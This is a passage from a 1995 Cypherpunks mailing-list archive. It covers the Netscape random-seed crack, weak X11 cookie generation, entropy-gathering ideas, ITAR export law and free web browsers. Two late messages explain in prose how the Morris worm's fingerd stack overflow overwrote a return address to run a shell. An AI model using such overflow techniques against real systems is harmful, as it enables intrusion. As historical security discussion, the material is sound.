SIGNATURE----- Version: 2.6.2 iQBFAgUBMGFgp/FZTpBW/B35AQFiuAF/c7DUidkXEe1oBdRpsmfzkXzii44qFPQ3 YQui2lORNA8RUaWiB25poSLFNdiBMJnX =duqf -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From vznuri at netcom.com Thu Sep 21 12:46:43 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 21 Sep 95 12:46:43 PDT Subject: economic espionage (@#$%^&*) In-Reply-To: <9509201546405398@ci.diamond-bar.ca.us> Message-ID: <199509211936.MAA23834@netcom13.netcom.com> >> >It was said that Pres. Clinton had given a speech while >> >visiting the CIA HQ in Langley/Virginia. He allegedly >> >said in this speech that obtaining industrial >> >informations has the highest priority and this were the >> >new task for the spies. ah yes, just like the way Clinton alone came up with the whole Clipper idea as a way to balance the legitimate goals of law enforcement with the right to privacy in society. careful Bill, your strings are showing. and I won't say who is the puppeteer, but he has the initials N.S.A. pardon me, but this new "economic espionage" sleazoid-intelligence- agency-justifying bugaboo really annoys me. boy, I wish I could get my job to work the way the government works. I go to my boss, and say, "repeat after me: you will be given a fat raise because you are crucial to the company". I would *die* to see an op-ed in the NYT with the subject: "economic espionage: the new bogeyman decoy after the cold war" From liberty at gate.net Thu Sep 21 13:00:46 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 21 Sep 95 13:00:46 PDT Subject: Munitions shirt (again) Message-ID: <199509211956.PAA20713@tequesta.gate.net> Dear Cypherpunks: I sent this yesterday, but it appears toad may have eaten it. Here it is again. JMR -----BEGIN PGP SIGNED MESSAGE----- Ian Goldberg wrote: >>So, any consensus as to whether it's actually illegal to do so? I >>remember some disagreement a few weeks ago that AFAIK wasn't resolved. And Tim replied: >The _consensus_ here seems to be: "This t-shirt is illegal to wear in front >of non-Americans," judging by the comments here. And since _I_ started all this trouble with a private e-mail to Futplex; I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be illegal to wear in front of non-Americans," from my reading a while back of the dense text of this silly law, [I'll spare all of you a quote of it, but there's text that MIGHT be interpreted that way.] >The _reality_ is quite different, I think, and the "this shirt is illegal" >hype is, in my opinion, just that, hyperbole. I agree with Tim that actual enforcement of this silly a law is unlikely, especially in Ian's case right now, and *especially* during our US (election) "silly season," for obvious reasons. The availability of strong encryption is unlikely to be a major issue during this election cycle, despite Cypherpunk efforts, and enforcement of this dumb law would be a "gift" to those of us who think it should be. [I hope I'm wrong here, but I think you're safe, Ian.:)] >Even hyperbull, too. I wouldn't go *that* far, though. Poorly written, ambiguous, statist laws can be interpreted in any number of ways and for a variety of reasons having little (or nothing) to do with justice. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc bto4hKBrFWY= =qlSx -----END PGP SIGNATURE----- Regards, Jim Ray "People are deceived in masses, but enlightened one at a time." -- Dick Boddie. ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From tcmay at got.net Thu Sep 21 13:07:03 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 13:07:03 PDT Subject: Prosecution of Cracking Security Systems Message-ID: At 9:42 PM 9/20/95, Brian Davis wrote: >Certainly, Cypherpunks has gotten press lately, and what I've seen has >been good press. Capitalize on it. > >Finally, I've got to say that, as someone new to the concepts discussed >here, I found it extremely cool to read about the latest break here and >then see it in the news a day or two later. Indeed, it gives you a day's head start in preparing a prosecution! (Just kidding, of course. Brian may be a DA, but he's showing signs of being "one of us.") And on a serious note, the cracks of these various systems are helpful to the overall community. Better locks. To pick up on a point Brian made several days ago about whether or not hackers who break into systems should be applauded, criticized, prosecuted, whatever, this is how I see things, in direct parallel with the recent Netscape cracks: * Situation 1: A person who enters my home by bypassing locks cannot claim to be "just testing security" and should be prosecuted for trespass, if nothing else. * Situation 2: However, a person who publically demonstrates that a well-known type of lock is weak and can be easily bypassed is well within his rights and is, I think, doing the community a favor. I mean that he demonstrates this on a lock, or system, and not by breaking into a system. (It may be true that some number of potential thieves use the knowledge that a given lock is weak to commit crimes, but that's not the responsibility of the person demonstrating the weakness.) (Sidebar: There are some subtleties. What about someone who breaks into a computer system and leaves a harmless message announcing his intrusion? What about someone who enters my house while I'm asleep and leaves a message saying "Get better locks!"? What about Randall Schwartz and his security checks of his employer, Intel?) It seems clear to me that the breaking of Netscape's security is an example of Situation 2. And many cracker break-ins are Situation 1, though in many cases the crackers are not full-fledge criminals and may think they are just testing security. (This goes to motive, I'm sure Brian would agree, and may be why a 16-year-old cracker gets a suspended sentence instead of hard time.) (A more problematic case is what about systems with very weak or no security? This is somewhat like a yard with no clearly marked boundary, no fence, etc., or like a beach towell with valuables left on it. We've debated issues like this several times on the Cyberia list, so I won't here.) One thing that worries me is that some of the proposed laws about intellectual property and enforcment of copyrights may make it illegal to try to break the cryptographic protections of systems, even systems one has control over. (Some similarities to the "no reverse engineering" shrink-wrap licenses.) It's conceivable that Netscape Communications could, under these "anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner. My guiding principles about locks and security are these: * Theft is theft, even if a bicycle is left unlocked or a house door is left ajar. * However, the first line of defense is for a property owner to lock his property up, to place fences around property, etc. Cops cannot protect in all situations, which is why security services and tools exist. * Since enforcement resources are limited, I can understand why the investigation of a theft involving unlocked, unsecured property is given low priority. This doesn't make the theft "right," and if the thief is somehow caught he cannot use the "But it was unlocked!" defense. (These problems are lessened in a system where people pay for protection, as with insurance systems, and of course as with anarcho-capitalism of the sort discussed by Benson, Friedman, and others.) --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 21 13:17:27 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 13:17:27 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? Message-ID: I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA Mosaic gives me a thought: At 6:44 AM GMT 9/21/95, John Gilmore wrote: >> I realize that some cypherpunks think that we should make all of >> our code publicly available. In an ideal world that would be great, >> but we live in a world with politicians, crooks, lawyers, stockholders, >> etc... Don't expect to see us posting our entire security >> library source code to cypherpunks. > >Naah. I think NCSA should've made Mosaic publicly available, because >they wrote it with our tax dollars. And I hold it against them that >they started the trend of "zero-cost personal-use binaries but no >commercial use" that many Net users still confuse with Real Free >Software (free as in freedom). But Netscape owns its code, it can do >whatever it wants with it. Why not a Gnu-style Web browser? I don't know if the original Mosaic can be used and added to, but I can imagine something like this could be done. Web browsers are becoming, for many of us, our de facto interfaces to the Net, not just the Web. A project to make a truly freely distributable Web browser and Web server (the other part of the puzzle) could be interesting. Strong crypto could be added by volunteers working in their specialties, and the "Web proxie" could be put in with robustness (D-H forward secrecy, for example). I'll stop now, as I've never been a Gnu customer (except for Emacs), and so I'm not really in a position to comment and speculate on Gnu. For all I know, Stallman and others have already thought of this and are working on it. --Tim May Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From robv at teleport.com Thu Sep 21 13:31:56 1995 From: robv at teleport.com (Rob Vaughn) Date: Thu, 21 Sep 95 13:31:56 PDT Subject: [NOISE] Re: NYT on Netscape Crack Message-ID: <199509212030.NAA17997@desiree.teleport.com> Perry sez: >I'll pay for the "I broke Netscape's Security" T-Shirt for the >enterprising person that takes the time to find them in the object >code. (See Sameer's page on the shirts he's developing as prizes for >the Netscape flaw finders.) I find it very ironic that a company that recently raised about a gadzillion dollars through a public stock offering has been able to sit back and let people find problems with their software for free. Now people like Sameer and Perry are offering rewards for it. Kudos to them, but I think Netscape should be the one making an offer like this. A textbook author/prof who taught a class using his own book had a great method for finding mistakes in the new edition: he had us buy the current edition and gave us copies of each chapter of the new edition as we got to it, then he offered a $10 reward for each typo or mistake found, and a $100 dinner for two and credit in the new edition to whomever found the most mistakes by the end of the semester. I made $160 before I had to drop the class due to a schedule conflict. In the end, he said he was able to find over 100 errors, and considered it the cheapest and most thorough proofreading he'd ever paid for. And the class got a big charge out of it. Netscape should be offering rewards for people who find problems with their software. They'll get a lot of hard work for almost free (since you only get paid if you do find something) and in a year or two they'll have one of the most solid applications on the market. Lord knows it'll help raise public confidence too. If a tee-shirt motivates people, think what $US 1000 reward would do. Or $e 2000 in credit towards goods purchased through Netscape commercial servers? Rob V. From sameer at c2.org Thu Sep 21 13:35:47 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Sep 95 13:35:47 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com> Message-ID: <199509212030.NAA05084@infinity.c2.org> The only bad publicity is no publicity. > > In article , carolann at censored.org (Censored Girls Anonymous) writes: > > > Lookit that! 416 trades and 11 times there was more > > buying pressure than selling pressure.. > > > The rumors of bug fix are outweighing the facts of the crack! > > > I am totally amazed! But think company insiders are probably > > supporting the stock. Holding up better than ascii armor, it is. > > I think it probably has more to do with the fact that the name > "Netscape" has been on the front page of every major newspaper in the > US. I guess bad press is better than no press at all. And the press > hasn't even been that bad. > > -- > Sure we spend a lot of money, but that doesn't mean | Tom Weinstein > we *do* anything. -- Washington DC motto | tomw at engr.sgi.com > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From joelm at eskimo.com Thu Sep 21 13:41:50 1995 From: joelm at eskimo.com (Joel McNamara) Date: Thu, 21 Sep 95 13:41:50 PDT Subject: Cryptography book source Message-ID: <199509212041.NAA17913@mail.eskimo.com> Just stumbled on to an online book vendor that advertises over a million titles available for order, many discounted from list. Very nice Web interface. A quick search for "cryptography" displayed 121 titles. A wide range, from Crypto proceedings to technical to historical. Check out: http://www.amazon.com Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key Thomas Jefferson used strong crypto, shouldn't you? From bdolan at use.usit.net Thu Sep 21 14:59:27 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Thu, 21 Sep 95 14:59:27 PDT Subject: Crypto *import* ban? Message-ID: What exactly does a ban on import of "defense articles and services" which are not in "furtherance of world peace" mean? Could you ban crypto imports? Imports of chopped liver? ---------- Forwarded message ---------- Here is a final rule issued by ATF regarding the import of "defense articles" into the United States. It appears in the Federal Register at 60 FR 47866 (9/15/950). This becomes a regulation in the Code of Federal Regulations, Title 27 CFR, part 47, Importation of Arms. Sec. 47.52 Import restricitons applicable to certain countries. (a) It is the policy of the United States to deny licenses and other approvals with respect to defense articles and defense services originating in certain countries or areas. This policy applies to Cuba, Iran, Iraq, Libya, Mongolia, North Korea, Sudan, Syria, Vietnam, and the States that comprise the former Soviet Union [list of countries omitted]. This policy applies to countries or areas with respect to which the United States maintains an arms embargo [list of countries omitted]. It also applies when an import would not be in furtherance of world peace and the security and foreign policy of the United States. [end excerpt] From vince at offshore.com.ai Thu Sep 21 15:22:52 1995 From: vince at offshore.com.ai (Vincent Cate) Date: Thu, 21 Sep 95 15:22:52 PDT Subject: real randomness for netscape - user clicking mouse Message-ID: Jeff Weinstein >If anyone has specific suggestions I would love to hear them so that we >can do a better job. Why not just do something similar to what PGP does? For netscape you could have a user make circling motions with the mouse and clicking at random times. For each click of the mouse you could get a few bits of randomness from the time, the X position, and the Y position. You could get random bits really fast this way. You only need to do this the first time a user uses encryption, or you might just go ahead and force all users to do this as part of starting up netscape the first time. On subsequent times you use your encryption algorithm to make your next seed. To be safe you could make up two seeds, encrypt each of them to mix them up a bit, and then XOR the results together. A random bit XORed with a non-random bit still produces a random bit. Actually there is probably a better way to just encrypt each input whole (padding to block size) and XORing as you go along - that way you would get whatever randomness was there to be had. Anyway, do something so you have as many or more bits of randomness in your seed as there are bits in your key or it will still be a weak link in your security chain. You could even get the randomness during regular mouse use. Unless the first thing a user did was try to use encryption I am sure you would have enough by the time he did use encryption (keep track). You must get the random bits from something that nobody else could watch. Network packets, process IDs, date, time, etc are not secure. On the other hand, an attacker would have to have broken the machine to get the mouse info used above, in which case netscape would have no security no matter what. -- Vince PS I want a free netscape server site license if you use this idea! :-) From cjs at netcom.com Thu Sep 21 15:31:49 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Thu, 21 Sep 95 15:31:49 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509212030.NAA05084@infinity.c2.org> Message-ID: <199509212125.RAA00188@hoopsnake.cjs.net> > > > I am totally amazed! But think company insiders are probably > > > supporting the stock. Holding up better than ascii armor, it is. > > > > I think it probably has more to do with the fact that the name > > "Netscape" has been on the front page of every major newspaper in the > > US. I guess bad press is better than no press at all. And the press > > hasn't even been that bad. Yeah. Thats the way it works sometimes. I remember back when that housewife from minnasota launched her media campaign to have "Married With Children" taken off the air. All it did was make the show a hundred times more popular and extend its life for years after it probably would have been canceled on its own. And the sad part is that now that they have announced that they are dropping their unofficial Linux support, I really want to hurt Netscape badly. Sigh. Christopher From tomw at orac.engr.sgi.com Thu Sep 21 15:42:57 1995 From: tomw at orac.engr.sgi.com (Tom Weinstein) Date: Thu, 21 Sep 95 15:42:57 PDT Subject: netscape bug Message-ID: <199509212242.PAA04533@orac.engr.sgi.com> In article , "Vladimir Z. Nuri" writes: > P.M. notes that anywhere there is a data-driven buffer overflow (which > he suspects are all over netscape) he can get code to execute anything > he wants. this reminds me of the > Morris internet worm that ran exactly the same way. it used a > bug in the finger demon that caused a string buffer overwrite > (via strcpy, instead of strncpy) to execute customized code. > my question: I have not seen the specifics of how this works. does > this require specialized knowledge of the native machine language on the > host machine? or is it just used to cause something like a core dump > to get a command line or something like that? I question the accuracy of this. The fingerd bug was that a string in the static data area was read in with gets which could be overflowed. At some point in memory after this input buffer was the string constant that stored the name of the finger command. What the Morris work did was to overflow the input buffer and replace the string constant "finger" with "csh". When fingerd then exec'ed the command, that gave you a shell running on the machine. While it is certainly true that you can stomp on memory in static buffers, it's not clear that you can execute whatever code you insert there. If the buffer happens to be allocated off the stack (and the stack grows down) then you can modify the return address. Of course, you have to know the address of whatever code you want to execute. And that code has to do something useful. Presumably, if there are two bugs, one which lets you write over a static buffer and one for a buffer allocated from the stack, then you could execute code of your choosing. Of course, that also assumes that you can execute from the data area which is not always true. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at engr.sgi.com From eb at comsec.com Thu Sep 21 16:02:11 1995 From: eb at comsec.com (Eric Blossom) Date: Thu, 21 Sep 95 16:02:11 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <43psn2$6ug@tera.mcom.com> Message-ID: <199509212245.PAA15299@comsec.com> > > What I would like: > > Any OS has access to a number of real-world physical sources of > randomness. This information is not made available to a user level > process. How long did that last seek take? Was there any noise on > the microphone? It would be good if the OS could gather that > information and make some set of bits available to any process that > asks. Having this be part of all OSes would make my job easier. We've got a *real* hardware random number generator that was developed for our secure phones. If you are seriously interested, we can glue the RNG onto the end of a serial port for you. It generates about 8000 bits of uncorrelated noise / second. Eric Blossom COMSEC Partners 707-577-0409 From raph at CS.Berkeley.EDU Thu Sep 21 16:35:29 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Thu, 21 Sep 95 16:35:29 PDT Subject: Anyone for testing MOSS? Message-ID: <199509212335.QAA19745@kiwi.cs.berkeley.edu> I've just gotten TISMOSS 7.1 running (whew!) and wondered if there was anyone else out there who could exchange encrypted email with me. Here is my public key: alias:raph at cs.berkeley.edu public-key:MFkwCgYEVQgBAQICAgADSwAwSAJBAKQ2qG5eZDa58HpVxM9fpru2hDVVkw0iK GC3BMhagHpio7XlGydpkbY3iSV08U92VVbkyTeB2aWhSe2xUUaONPsCAwEAAQ== I guess I'll probably wait until next week to test S/MIME. Raph From stripes at va.pubnix.com Thu Sep 21 17:19:30 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 21 Sep 95 17:19:30 PDT Subject: XDM has the same problem as netscape ?! In-Reply-To: <43s1j7$nd3@calum.csclub.uwaterloo.ca> Message-ID: In message <43s1j7$nd3 at calum.csclub.uwaterloo.ca>, Ian Goldberg writes: >In article <9509210631.AA18308 at sfi.santafe.edu>, >Nelson Minar wrote: >>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had >>the same problem: the random seed was based on the current time to the >>microsecond, modulo the granularity of the system clock. I think I >>figured that on my hardware, if I could figure out which minute the X >>server started (easy with finger), I'd only have to try a few >>thousand keys or so. Caveat: I never actually proved the idea. > >Wow. I just checked, and Nelson's right. [...] Of corse you can do what I have been doing for years: $cookie=`good-source-or-random-hex-strings` xauth add $DISPLAY MIT-MAGIC-COOKIE-1 $cookie xinit ~/.xinitrc $DISPLAY -- $server :$port -auth $XAUTHORITY (assuming you set the various variables correctly) This will allow you to gennerate your own cookies rather then relying on MIT. (I actually have C code to set the cookie dirrectly, since I don't really care to have it visable to ps, even breifly). Unfortunitly X will blat the "secret" out in the clear every time you make an X connection, so it still isn't very good. From jsimmons at goblin.punk.net Thu Sep 21 18:11:52 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Thu, 21 Sep 95 18:11:52 PDT Subject: Netscape to end Linux support? In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net> Message-ID: <199509220108.SAA05948@goblin.punk.net> > > And the sad part is that now that they have announced that they are > dropping their unofficial Linux support, I really want to hurt > Netscape badly. > > Sigh. > Anyone got a pointer to this announcement? Damn! Just when I was starting to like them ... -- Jeff Simmons jsimmons at goblin.punk.net From tcmay at got.net Thu Sep 21 18:16:54 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 18:16:54 PDT Subject: economic espionage (@#$%^&*) Message-ID: Vlad writes: >I would *die* to see an op-ed in the NYT with the subject: >"economic espionage: the new bogeyman decoy after the cold war" You might want to prepare your memorial service, then, as I recall reading editorials along these lines back around 1990, when "should the NSA be used for economic espionage?" was in the news. Not the exact title of their editorial, but the gist was that turning the NSA into a spy agency at the beck and call of Ford and Motorola is a bad idea. But if you die, Vlad, "the vznuri," at least you have seven other functioning tentacles. --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From norm at netcom.com Thu Sep 21 18:25:21 1995 From: norm at netcom.com (Norman Hardy) Date: Thu, 21 Sep 95 18:25:21 PDT Subject: Pitfall in producing random numbers Message-ID: I think that it was on the cypherpunks list that I learned of how PGP for the IBM PC, running under emulation on the Mac failed to produce good random numbers. The virtual PC clock proceeded forward by very predictable manner. Perhaps the details were different but the nature of the pitfall is clear. I did not notice that pitfall mentioned in RFC 1750. (Its the only hazard that I know of that they missed.) The only thing I can think of protecting against this is to do some simple checks against more obvious ways that virtual clocks might produce times. Low order bits should not always be zero. The differences between successive readings should not be constant. Two clock readings separated by a computation of known length should be within a factor of a few of the expected value. If not try again once or twice. Such tests are imperfect but I think that they would have noticed the virtual clock on the virtual PC. If they fail the program can require the user to enter the seed, with all that that entails. From perry at piermont.com Thu Sep 21 18:28:55 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Sep 95 18:28:55 PDT Subject: Seeds which depend on machine states In-Reply-To: <199509211044.GAA25896@mail-e1a.megaweb.com> Message-ID: <199509220128.VAA01900@frankenstein.piermont.com> Miguel Diaz writes: > It is my suspicion that seeds which depend on machine > states(ie state of your computer at a specific instance of > time) would always be subject to scrutiny and de-cryption. > As long as the software used to encrypt is not self-modifying, > the machine state can (through careful manipulation involving > temperature, clocks, processes etc)always be replicated and > fixed to an acceptable degree. Try getting a human to type with the same timing, to microsecond precision, the same way twice. Perry From dmandl at panix.com Thu Sep 21 18:31:04 1995 From: dmandl at panix.com (David Mandl) Date: Thu, 21 Sep 95 18:31:04 PDT Subject: Netscape closes up 1 3/8 today! Message-ID: At 1:30 PM 9/21/95, sameer wrote: > The only bad publicity is no publicity. This assumes that you're trying to sell something. Some people actually have no use or desire for publicity. Publicity has caused a quick and painful death to many scenes, movements, cabals, and "temporary autonomous zones." --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From tcmay at got.net Thu Sep 21 18:32:43 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Sep 95 18:32:43 PDT Subject: Munitions shirt (again) Message-ID: At 7:02 PM 9/21/95, Michael Shields wrote: >> There is nothing in the ITAR that refers to ``machine-readable'' so >> there is no need to interpret that term. > >The issue is that it has been formally used as the criterion that >distinguishes "technical data" from "defense articles". See Phil Karn's >CJ requests on the _Applied Crypography_ book and floppy. Hear, hear! Michael is correct in pointing out that the "machine-readable" part has indeed been a criterion...if the ITARs in general are unlikely to withstand scrutiny, then trying to get books banned would really cause problems. Also, one of the criteria I recollect is that "systems" were barred from export, not just algorithms. Algorithms are very widely discussed, even described in detail in patents. "Cryptographic systems," embodied in systems, circuits, and specific programs, are not the same as what gets published in textbooks. (BTW, I'm glad I can now read the posts of Michael Shields. His MIME PGP was admirable, in intent, but many of us (from comments here and that were sent to me) just can't handle whatever MIME configuration he was previously using.) --Tim May Notice: Don't expect me to reply to trivial questions and complaints. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dvw at hamachi.epr.com Thu Sep 21 18:38:56 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Thu, 21 Sep 95 18:38:56 PDT Subject: Prosecution of Cracking Security Systems Message-ID: <30621328@hamachi> Tim May wrote: > One thing that worries me is that some of the proposed laws about > intellectual property and enforcment of copyrights may make it illegal to > try to break the cryptographic protections of systems, even systems one has > control over. (Some similarities to the "no reverse engineering" > shrink-wrap licenses.) > > It's conceivable that Netscape Communications could, under these > "anti-hacking" laws, seek a prosecution of some future Goldberg and Wagner. Actually, Lehman's report does not recommend this harsh of a measure. The report recommends penalties (some criminal) for tampering with and disabling mechanisms that are protecting copyright for protected works, and the protected works themselves. If a hacker operating in the "public service" mode you described were tampering with and/or disabling a protection mechanism that was applied to their own works, or test patterns and the like, they wouldn't fall under the recommended guidlines. It is pretty clear from my reading that you need to have an intent to violate copyright (i.e. steal stuff) in order to trigger the penalties. Who knows how badly Congress will mangle all of this... dvw From jirib at sweeney.cs.monash.edu.au Thu Sep 21 18:40:27 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Thu, 21 Sep 95 18:40:27 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping) In-Reply-To: Message-ID: <199509220137.LAA12354@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Laurent Demailly
and "NSB's Portable (via RadioMail)" and cypherpunks at toad.com "NSB's Portable (via RadioMail)" writes: > At 4:32 AM 9/21/95 +0200, Laurent Demailly wrote: ... > >financial insecurity never was a problem as > >long as it remains under a small %. > > This is an amazing statement, Laurent. ... It's not an amazing statement. As long as the cost of insecurity is less than cost of security, there's no problem. ... > We're not opposed to cryptography, by the way. There are some obvious > places where the use of digital signatures could directly enhance our ... Okay, so what's stopping you from starting right now with PGP? You could simply have that as an alternative to the current system (on a per-ID basis, ie new customers specify PGP or not). Quite a few people both have PGP and would think well of you if you started using it. How about "The safest Internet payment system just got safer."? Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGITYCxV6mvvBgf5AQGN0wP8DxZ50ZMR3H+W6LCc0vhFZ6GMrTRZPSM4 XULabVj4w59aEDUWj2wbueXaPJUMHpAgYK83oMGLtlu1Hrxzo9/SXT/WzcMUZp7q qajmCXRY9q3b+OXznTLavrF5qISlPY8NU/HbSi/nCF8kbT6eEf8rXc/uZgPCyV6j RuvE2VDWaCc= =J4iR -----END PGP SIGNATURE----- From dvw at hamachi.epr.com Thu Sep 21 18:53:54 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Thu, 21 Sep 95 18:53:54 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft Message-ID: <306216B6@hamachi> >> Now, this is all expected to change, to become more harmonious >> with the rest of the world. The changes that I've heard are >> 1) Go to first-to-file instead of first-to-invent Michael Shields wrote: > Does this mean that prior art would no longer invalidate a patent? No. It just moves the prior art date from the date of invention to the date of filing the patent application. dvw From rmtodd at servalan.servalan.com Thu Sep 21 19:06:20 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Thu, 21 Sep 95 19:06:20 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? In-Reply-To: Message-ID: In servalan.mailinglist.cypherpunks Tim May writes: >Why not a Gnu-style Web browser? I don't know if the original Mosaic can be >used and added to, but I can imagine something like this could be done. Um, if you mean "freely distributable, in source form" by "Gnu-style", I don't think there's much of a shortage of Gnu-style WWW browsers and servers. Lynx and Chimera are my two favorite WWW browsers, and both come in source form. Then there's w3.el, the WWW browser for Emacs. As for Web servers, you can get the source code for Plexus or CERN httpd off the net. Plus, doesn't Eric Young have someone's httpd already hacked to include SSL-compliant encryption? The question becomes why don't the free WWW software people out there now support crypto? Maybe they're simply not expert in or interested in crypto, or maybe they don't want to mess with the ITAR hassles. From rrothenb at ic.sunysb.edu Thu Sep 21 19:15:29 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Thu, 21 Sep 95 19:15:29 PDT Subject: real randomness for netscape - user clicking mouse In-Reply-To: Message-ID: <199509220214.WAA16926@libws4.ic.sunysb.edu> > Why not just do something similar to what PGP does? Yes, why not... (it's been suggested before) > For netscape you could have a user make circling motions with the mouse > and clicking at random times. For each click of the mouse you could get a > few bits of randomness from the time, the X position, and the Y position. > You could get random bits really fast this way. Careful... the buttons one tends to click on are in the same regions, and the entropy would not be as great as say, with keyboard timings. I think fast timings between clicks (maybe added or xor'd with low bits from mouse positions?) is a better solution. Though the best way is to experiment... I wrote a DOS ISR to capture timings between clicks ('keyrand?.zip' on some ftp-sites) and experimented with speeding up the system clock (which is normally 18.2 times/sec), but the entropy appeared lower (superficially less random). -Rob From sommerfeld at orchard.medford.ma.us Thu Sep 21 19:19:20 1995 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Thu, 21 Sep 95 19:19:20 PDT Subject: netscape bug In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com> Message-ID: <199509220208.CAA00564@orchard.medford.ma.us> > I question the accuracy of this. The fingerd bug was that a string in > the static data area was read in with gets which could be overflowed. > At some point in memory after this input buffer was the string constant > that stored the name of the finger command. What the Morris work did > was to overflow the input buffer and replace the string constant > "finger" with "csh". When fingerd then exec'ed the command, that gave > you a shell running on the machine. Nope, that wasn't it, either. See the Eichin/Rochlis "tour of the worm" paper. I was visiting friends at MIT the night the worm hit. After receiving some confused and unspecific reports that the worm was getting in through fingerd, I had a flash of insight as to how that might happen; as it turned out, this insight was correct, and shortly thereafter, I had reproduced a benign form of the fingerd attack. As implemented by the worm, it only worked on vaxes, but it could have worked on other systems. The buffer in question was on the stack, not in static storage. The attacker wrote a long sequence of NOP's, followed by machine instructions which implemented the equivalent of exec("/bin/sh"), followed by the approximate stack address of the stack buffer; the last address was at the right place to overwrite the saved PC field in the stack frame. When the routine "returned", it actually branched into the runway of NOP's, and then exec'ed "/bin/sh". Note that the actual stack address varied, as environment variables (which tend to vary from installation to installation) are located at the top of the stack. As it turned out, the attack did not work on most Athena systems, because the athena /etc/rc complex wound up using a large number of environment variables which pushed the location of the stack frame in question out of the range where the attack would have worked. - Bill From perry at piermont.com Thu Sep 21 